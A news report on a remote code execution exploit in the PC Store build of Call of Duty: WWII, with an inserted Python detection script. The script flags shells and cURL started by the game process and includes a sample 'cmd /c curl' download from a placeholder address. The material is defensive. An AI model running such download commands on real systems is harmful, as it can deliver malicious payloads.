
The hacker so far just seems to be trolling players (Image: vx-underground official X account).


2 weeks ago

Call of Duty: WWII pulled from Xbox PC Game Pass amid RCE exploit chaos

The Xbox PC release was probably supposed to be a quiet drop, but what players got instead were pop-ups, downloads, and a lawyer’s face on their desktop.

Activision has removed Call of Duty: WWII from PC Game Pass just days after its release, following credible reports of a remote code execution (RCE) vulnerability. The version affected is the so-called “Xbox PC” build distributed via the Microsoft Store. The game remains live on Steam and Battle.net, although players are now being urged to exercise caution.

An RCE exploit allows an attacker to remotely run malicious code on someone else’s computer. As cybersecurity firm Invicti explains, “The term remote means that the attacker can do that from a location other than the system running the application.” This isn’t about in-game cheating–RCEs are serious security flaws often used to install malware, steal data, or worse.

RCE exploit observed in Call of Duty: WWII gameplay footage

Streamer Wrioh posted a video on X in which Call of Duty: WWII freezes mid-match, followed by a series of suspicious command windows popping up. Moments later, their desktop wallpaper changes to the image of a man’s face.

Another user, @LasagneManne, shared a screenshot showing what appears to be a cheat tool that includes an RCE toggle alongside more traditional features like God Mode and player kicks.

Meanwhile, VX-Underground, a well-known white-hat group that frequently shares malware research, confirmed evidence of RCE abuse. “Someone is trolling gamers with Notepad pop ups, PC shutdowns, and gay pornography,” they posted on X.

VX-Underground admin breaks down the Call of Duty: WWII exploit

In a detailed follow-up, VX-Underground administrator “Smelly” provided a technical breakdown of what’s likely happening in the viral footage. While stressing that it’s an educated guess due to the lack of forensic data, Smelly explained:

“An RCE exploit… is a type of computer exploit in which an attacker is capable of delivering a payload (malicious computer code) to a remote target. More often than not, RCE exploits can possess limitations such as privileges–what it can and cannot execute–depending on whether the application runs as user or admin.”

He added that this issue only affects PC, not consoles like Xbox, because the Xbox OS is more locked down despite using the same core Windows kernel.

As for how attackers might be getting victims’ IP addresses, Smelly explained that Call of Duty: WWII uses outdated peer-to-peer (P2P) networking. Unlike modern titles that rely on dedicated servers, P2P exposes players’ IPs to others in the same lobby–a holdover from older Call of Duty titles.

In the clip from Wrioh, a CMD window appears to show a file being downloaded using the command-line tool cURL. Shortly afterwards, a second CMD window opens Notepad to display a .txt file–likely the downloaded file. Later, when the game crashes or is closed, the desktop wallpaper changes.

“It is worth noting that changing the desktop wallpaper is slightly more complex… which illustrates the attacker is capable of downloading a malicious script and having CMD execute that as well,” Smelly noted.
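For defenders, the behaviour described above (command shells and a cURL download appearing while the game is running) maps onto a simple process-ancestry check over process-creation logs. The following is an added example, not code from the article, VX-Underground, or Activision. It assumes the shells are started as descendants of the game process, and the event fields, PIDs, file name, URL, and the image name `game_placeholder.exe` are all constructed placeholders, since the page does not name the binary.

```python
# Constructed process-creation events (Sysmon Event ID 1 style). All values are made up.
GAME_IMAGE = "game_placeholder.exe"   # hypothetical name; the article does not give one
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl.exe"}            # the tool seen in the clip

EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": GAME_IMAGE,     "cmd": GAME_IMAGE},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",      "cmd": "cmd.exe /c curl -o a.txt http://198.51.100.7/a.txt"},
    {"pid": 301, "ppid": 300, "image": "curl.exe",     "cmd": "curl -o a.txt http://198.51.100.7/a.txt"},
    {"pid": 310, "ppid": 200, "image": "cmd.exe",      "cmd": "cmd.exe /c notepad a.txt"},
    {"pid": 311, "ppid": 310, "image": "notepad.exe",  "cmd": "notepad a.txt"},
    {"pid": 400, "ppid": 100, "image": "cmd.exe",      "cmd": "cmd.exe"},  # shell the user opened
    {"pid": 401, "ppid": 400, "image": "curl.exe",     "cmd": "curl https://example.com"},
]

def has_game_ancestor(pid, by_pid):
    """Walk the parent chain; True if any ancestor is the game process."""
    seen = set()                      # guards against loops caused by PID reuse
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid and by_pid[pid]["image"].lower() == GAME_IMAGE:
            return True
    return False

def detect(events):
    """Return (pid, reason) for shells and download tools running under the game."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not has_game_ancestor(e["pid"], by_pid):
            continue                  # e.g. a shell the user started from explorer.exe
        image = e["image"].lower()
        if image in SHELLS:
            alerts.append((e["pid"], "shell spawned under game process"))
        elif image in DOWNLOADERS:
            alerts.append((e["pid"], "download tool under game process"))
    return alerts

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The same parent-child condition can be expressed in an EDR or SIEM rule; the user-opened shell (PIDs 400 and 401) shows why ancestry, not the mere presence of `curl.exe`, is the signal.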

The most worrying takeaway is that if attackers have administrative privileges, they may also be capable of installing malware such as info stealers, RATs (remote administration tools), or ransomware.

“Thankfully, it appears this attacker is primarily interested in memeing and f******* with people.”

The wallpaper in question reportedly features a well-known lawyer hired by Activision to go after cheat developers–suggesting this exploit may be as much of a statement as it is a prank.

Activision investigating vulnerability in Call of Duty: WWII

Activision has yet to officially confirm the existence of the RCE exploit. In a short statement, the company said the PC version of Call of Duty: WWII had been “brought offline” while it investigates “an issue.”

For now, the Microsoft Store version of the game has been delisted, and affected players are advised not to launch the game until more information becomes available.